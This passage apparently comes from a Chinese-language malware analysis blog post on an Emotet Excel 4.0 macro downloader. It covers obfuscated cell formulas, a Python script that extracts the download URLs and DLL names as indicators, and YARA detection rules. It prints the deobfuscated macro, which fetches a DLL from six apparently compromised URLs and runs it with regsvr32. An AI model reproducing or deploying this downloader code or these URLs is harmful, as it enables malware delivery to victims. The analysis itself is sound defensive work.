!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!G21&
!!N14&
!!E16& Rvfs!P13,B9)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ2"&
!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!H19&
!!N14&
!!E16& Rvfs!P13,B11)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ3"&
!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!I21&
!!N14&
!!E16& Rvfs!P13,B13)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ4"&
!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!J19&
!!N14&
!!E16& Rvfs!P13,B15)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ5"&
!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!K21&
!!N14&
!!E16& Rvfs!P13,B17)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ6"&
!!N4& Rvfs!H9& Rvfs!B15& Rvfs!I17& Rvfs!I3& Rvfs!H13& Rvfs!P11& Rvfs!K9& Rvfs!P13& Rvfs!P7& Rvfs!P13,B21)=FORMULA( Rvfs!P22& Rvfs!H13& Rvfs!N4& Rvfs!H13& Rvfs!H9& Rvfs!P11& Rvfs!P15& Rvfs!H9& Rvfs!P20&
!!D3&
!!J6&
!!F11&
!!P8&
!!B5& Rvfs!P15& Rvfs!P13,B23)=FORMULA( Rvfs!P22&
!!R6& Rvfs!P11& Rvfs!P13,B28)

部分拼接的字符串：

主要功能代码如下：

=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://church.ktc-center.net/PbSkdCOW/","..\adw.dll",0,0)
=IF(&"UDYQ1"<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://chobemaster.com/components/gus/","..\adw.dll",0,0))
=IF(&"UDYQ2"<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://christianchapman.com/cgi-bin/gADHL9UXSFUTN/","..\adw.dll",0,0))
=IF(&"UDYQ3"<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://chmiola.net/audio/6OuzyjPS/","..\adw.dll",0,0))
=IF(&"UDYQ4"<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://clanfog.co.uk/_vti_bin/aObJD8vpKaJRLKgoX6i/","..\adw.dll",0,0))
=IF(&"UDYQ5"<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://cipes.gob.mx/css/A046XJg/","..\adw.dll",0,0))
=IF(&"UDYQ6"<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\adw.dll")
=RETURN()

FBE4106C4303401DF89F6CFF0B1DBABC

'  Ufbd,D5,T( Shee!P11& Shee!P15& Shee!B5& Shee!C3& Shee!C9& Shee!A12),""
'  Ufbd,N6,T( Shee!E2& Shee!D17& Shee!F15& Shee!E6& Shee!E2& Shee!B18& Shee!G2& Shee!C9),""
'  Ufbd,F11,T( Shee!E2& Shee!D7& Shee!P15& Shee!P7& Shee!P15& Shee!E11& Shee!F4& Shee!B15& Shee!D13),""
'  Ufbd,P14,T( Shee!L2& Shee!P15& Shee!P7& Shee!P15& Shee!J6& Shee!J6& Shee!H9& Shee!H9& Shee!K14& Shee!K14& Shee!P15),""
'  Ufbd,Q23,T( Shee!P2& Shee!M7),""
'  Pdvse,E15,T( Shee!P19& Shee!P5& Shee!P5& Shee!P3& Shee!L11& Shee!M7& Shee!H4& Shee!G2& Shee!P5),""
'  Pdvse,E23,T( Shee!E2& Shee!F10& Shee!D7& Shee!C9),""
'  Pdvse,R24,T( Shee!P5& Shee!P5& Shee!P3& Shee!L11& Shee!M7& Shee!H4& Shee!G2& Shee!P5),""
'  DD,D10,"CONCATENATE( Shee!F15, Shee!C9, Shee!C9, Shee!P15)",""
'  PKEBEB,E9,"FORMULA( Shee!P22& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!E17& DD!R24& PKEBEB!D10& DD!H18,E11)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS1"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!E19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E13)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS2"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!G17& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E15)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS3"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!G19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E17)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS4"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!I17& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E19)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS5"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!I19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E21)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS6"& DD!S7& Shee!H9& Shee!B15& Shee!I17& Shee!I3& Shee!H13& Shee!P11& Shee!K9& Shee!P13& Shee!P7& Shee!P13,E23)=FORMULA( Shee!P22& Shee!H13& Shee!N4& Shee!H13& Shee!H9& Shee!P11& Shee!P15& Shee!H9& Shee!P20& DD!O14& DD!P10& DD!K6& Shee!P19& Pdvse!Q23& DD!E15& PKEBEB!D10& Shee!P13,E25)=FORMULA( Shee!P22& Shee!G41& Shee!P11& Shee!P13,E27)",""

主要区别在于下载的URL和Dll名，其余的下载的代码框架基本一样，还有细微差别的字符串拼接方式，比如“FBE4106C4303401DF89F6CFF0B1DBABC”用了“CONCATENATE”，作为下载代码，也没有过多的变化了。

提取

仅以此版本Emotet下载器代码来说，对我个人比较有效有意义的数据为：

1. 下载的URL

2. 保存下载的文件名

   下载的URL

3. 在单元格中以“"&"”拼接的字符串

可以使用Python提取单元格内容，正则提取有多个“"&"”子字符串的字符串，提取后再用replace删除“"&"”子字符串。

1. 存在“://”字符串（并且可能以“","”结尾）

   下载的文件名

   均以T函数进行拼接，特征是以“ ..\”开头，或者以“.dll”结尾。
   如果使用的是同一套的单个字符保存Sheet，那么“ ..[Dll名].dll”对应的命令为“=T([字符表Sheet]!P19&[字符表Sheet]!P5&[字符表Sheet]!P5&[字符表Sheet]!P3((&[字符表Sheet]!字符单元格){3,4})&[字符表Sheet]!P5&[字符表Sheet]!F15&[字符表Sheet]!C9&[字符表Sheet]!C9)”：
   

   文件名结构/解构

   “ ..[a-z]{1,}.dll”
   前为结构“ ..\”：1个空格“ ”+2个“.”+“\”；
   中间为需要提取的内容，目前分析的均为小写字母组合的3-4位字符串；
   后为结构“.dll”：“.”+“d”+2个“l”。
   特征结构比较固定，尤其是出现2个（2个连接）的情况，即使字母映射不同，也可以根据此规律进行提示。（当以目前发现的字母映射表进行提取无结果时，提醒有可能映射表被更换）
   ——但我使用Python从Excel读取数据时却发现，Python直接把数据计算出来了，和我想象中的（😅😅😅）以宏代码形式保存并不同：
   

   🐍🐍🐍Python代码🐍🐍🐍

2. 遍历文件夹，判断是否是xls文件，是的文件保存为列表，逐个打开

   1. 打开Excel文件后，获取[2]和[3]表格
   2. 遍历表格的单元格，仅保存有数据内容的单元格
3. 提取还原URL
   1. 遍历[2]表中有数据的单元格，判断是否有：
      1. “”&””：删除“”&””后正则匹配（/“[/\”,\”]”）提取URL
      2. “://”：正则匹配（://(.*?)\”,\”）提取URL
   2. 判断是不是6个（针对目前的发现规律，仅做提示，不影响提取功能）
4. 提取Dll名
   1. 遍历[3]表中有数据的单元格，判断是否有“..\”或“.dll”
   2. 有的话进行正则提取：先“\(.?).dll”后“|\(.?).”
   3. 判断正则提取的结果是否有且只有一个，不是的话进行提醒 ```python import os import re

import pandas as pd

strNewLine = “\r\n”

从单元格中提取非nan的内容

def GetValue2List( df ): nRow = df.shape[0] nColumn = df.shape[1] listValue = [] for iRow in range( nRow ): for iColumn in range( nColumn ): value = str( df.iloc[iRow , iColumn] ) if (value != ‘nan’): listValue.append( value )

# print(listValue)
return listValue

def RevivifyURL( listSheetURL ):

# print(listSheetURL)
reURL1 = re.compile( r'[/"](.*?)[/\",\"]"' )
reURL2 = re.compile( r'://(.*?)\",\"' , re.I )
listURL = []
for i in listSheetURL:
    strURL = ''
    # 保存方式1：以“"&"”拼接
    if '"&"' in i:
        # print( i )
        strCode = i.replace( '"&"' , '' )
        strURL = reURL1.findall( strCode )[0]
    # 保存方式2：直接保存
    elif '://' in i:
        # print(i)
        strURL = reURL2.findall( i )[0]
    if(strURL != '') and (strURL not in listURL):
        print( strURL )
        listURL.append( strURL )
if (len( listURL ) == 6):
    # print( listURL )
    pass
else:
    print( "🤔🤔🤔请人工分析🤔🤔🤔URL是否非6个" )

def RevivifyDll( listSheetDll ):

# print(listSheetDll)
# 匹配1：\\(.*?)\.dll，“\\”开头，“.dll”结尾
# 匹配2：\\(.*?)\.，“\\”开头，“.”结尾
reDll1 = re.compile( r'\\(.*?)\.dll' , re.I )
reDll2 = re.compile( r'|\\(.*?)\.' , re.I )
listDll = []
listRe = []
for i in listSheetDll:
    if ('..\\' in i) or ('.dll' in i):
        # print( i )
        listRe1 = reDll1.findall( i )
        # print( listRe1 )
        listRe.extend( listRe1 )
        if (len( listRe1 ) == 0):
            listRe2 = reDll2.findall( i )
            # print( listRe2 )
            listRe.extend( listRe2 )
            if (len( listRe2 ) == 0):
                print( "🤔🤔🤔请人工分析🤔🤔🤔2个正则都没有匹配出Dll" )
        if (len( listRe ) != 0):
            for iRe in listRe:
                if (iRe != '') and (iRe not in listDll):
                    listDll.append( iRe )
# print(listDll)
if (len( listDll ) == 1):
    strDllName = listDll[0]
    print( "Dll名：" , strDllName ,strNewLine)
else:
    print( "🤔🤔🤔请人工分析🤔🤔🤔Dll名格式是否能通过正则匹配" )

def ExtractEmotetIoCs( pathExcel ): dfExcel = pd.read_excel( pathExcel , sheet_name = None ) listKeys = list( dfExcel.keys() )

# URL在第2个隐藏Sheet
dfURL = dfExcel[listKeys[2]]
listSheetURL = GetValue2List( dfURL )
RevivifyURL( listSheetURL )
# Dll在第3个隐藏Sheet
dfDll = dfExcel[listKeys[3]]
listSheetDll = GetValue2List( dfDll )
RevivifyDll( listSheetDll )

遍历目录获取“.md”文件路径

def EnumDirGetExcelFilePath( pathDir ): print( “遍历的路径：” , pathDir )

listPathExcel = []
for root , dirs , files in os.walk( pathDir ):
    for file in files:
        print( file )
        pathFile = os.path.join( root , file )
        # print( pathFile )
        ExtractEmotetIoCs( pathFile )

pathFileExcel = “6EE99C20494D3876BEF6F882CA25DEE2.Emotet” pathDir = r”C:\Users\Administrator\Desktop\Emotet文档” if name == ‘main‘:

# 单个提取
# ExtractEmotetIoCs( pathFileExcel )
# 遍历文件夹提取
EnumDirGetExcelFilePath( pathDir )
print( "🥳🥳🥳顺利结束🥳🥳🥳" )

<a name="BbMOq"></a>
## 运行结果
![image.png](https://cdn.nlark.com/yuque/0/2022/png/1632223/1648803844157-cca20959-1aed-4cb4-82a4-97ab8cb486af.png#clientId=u15f9ce3d-53c4-4&from=paste&height=615&id=Q0ygM&originHeight=615&originWidth=545&originalType=binary&ratio=1&rotation=0&showTitle=false&size=96025&status=done&style=none&taskId=ub171be70-970c-477b-bbe2-d1d2bce074d&title=&width=545)
<a name="Nzvw1"></a>
# 附带知识点
<a name="lfvrF"></a>
## YARA
以下YARA均来源于VT聚合的规则：
<a name="FaAx6"></a>
### Microsoft_Excel_Hidden_Macrosheet
```yaml
rule Microsoft_Excel_Hidden_Macrosheet
{
    meta:
        author = "InQuest Labs"
        description = "This signature detects Microsoft Excel spreadsheets that contain hidden sheets. Presence of a hidden sheet alone is not indication of malicious behavior."
        created_date = "2022-03-15"
        updated_date = "2022-03-15"
        blog_reference = "https://support.office.com/en-us/article/hide-or-show-worksheets-or-workbooks-69f2701a-21f5-4186-87d7-341a8cf53344"
        labs_reference = "https://labs.inquest.net/dfi/sha256/127c67df5629ff69f67328d0c5c92c606ac7caebf6106aaee8364a982711c120"
        labs_pivot = "https://labs.inquest.net/dfi/search/alert/Excel%20Macro%20Manipulates%20Hidden%20Sheets"
        samples = "127c67df5629ff69f67328d0c5c92c606ac7caebf6106aaee8364a982711c120"
    strings:
        $ole_marker = {D0 CF 11 E0 A1 B1 1A E1}
        $macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
        $macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
        $hidden_xlsx_01 = /hidden\s*=\s*["'][12]["']/ nocase
        $hidden_xlsx_02 = /state\s*=\s*["'](very)?Hidden["']/ nocase
    condition:
        ($ole_marker at 0 and 1 of ($macro_sheet_h*))
        or
        any of ($hidden_xlsx*)
}

SUSP_Excel4Macro_AutoOpen

rule SUSP_Excel4Macro_AutoOpen
{
    meta:
        description = "Detects Excel4 macro use with auto open / close"
        author = "John Lambert @JohnLaTwC"
        date = "2020-03-26"
        score = 50
        hash="2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f"
    strings:
        $header_docf = { D0 CF 11 E0 }
        $s1 = "Excel" fullword
        // 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
        // ' 0018     23 LABEL : Cell Value, String Constant - build-in-name 1 Auto_Open
        // 00002d80:
        // 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 01 00 16 00 07 00
        // f4c01e26eb88b72d38be3d6331fafe03b1ae53fdbff57d610173ed797fa26e73
        // 00003460: 00 00 18 00 17 00 20 00 00 01 07 00 00 00 00 00  ...... .........
        // 00003470: 00 00 00 00 00 01 3a 00 00 3f 02 8d 00 c1 01 08  ......:..?......
        // ccef64586d25ffcb2b28affc1f64319b936175c4911e7841a0e28ee6d6d4a02d
        // ' 0018     23 LABEL : Cell Value, String Constant - build-in-name 1 Auto_Open
        // 00003560: 00 00 00 00 00 18 00 17 00 aa 03 00 01 07 00 00  ................
        // 00003570: 00 00 00 00 00 00 00 00 01 3a 00 00 04 00 65 00  .........:....e.
        $Auto_Open  = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
        $Auto_Close = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
        $Auto_Open1 = {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
        $Auto_Close1= {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
        // some Excel4 files don't have auto_open names e.g.:
        // b8b80e9458ff0276c9a37f5b46646936a08b83ce050a14efb93350f47aa7d269
        // 079be05edcd5793e1e3596cdb5f511324d0bcaf50eb47119236d3cb8defdfa4c
    condition:
        filesize < 3000KB
        and $header_docf at 0
        and $s1
        and any of ($Auto_*)
}

Office_Document_with_VBA_Project

rule Office_Document_with_VBA_Project
{
    meta:
        author = "InQuest Labs"
        description = "This signature detects an office document with an embedded VBA project. While this is fairly common it is sometimes used for malicious intent."
        created_date = "2022-03-15"
        updated_date = "2022-03-15"
        blog_reference = "http://msdn.microsoft.com/en-us/library/office/aa201751%28v=office.10%29.aspx"
        labs_reference = "https://labs.inquest.net/dfi/sha256/8a89a5c5dc79d4f8b8dd5007746ae36a3b005d84123b6bbc7c38637f43705023"
        labs_pivot = "N/A"
        samples = "8a89a5c5dc79d4f8b8dd5007746ae36a3b005d84123b6bbc7c38637f43705023"
    strings:
        $magic1 = /^\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00/
        $magic2 = /^\x50\x4B\x03\x04\x14\x00\x06\x00/
        $vba_project1 = "VBA_PROJECT" wide nocase
        $vba_project2 = "word/vbaProject.binPK"
    condition:
        (($magic1 at 0) or ($magic2 at 0)) and any of ($vba_project*)
}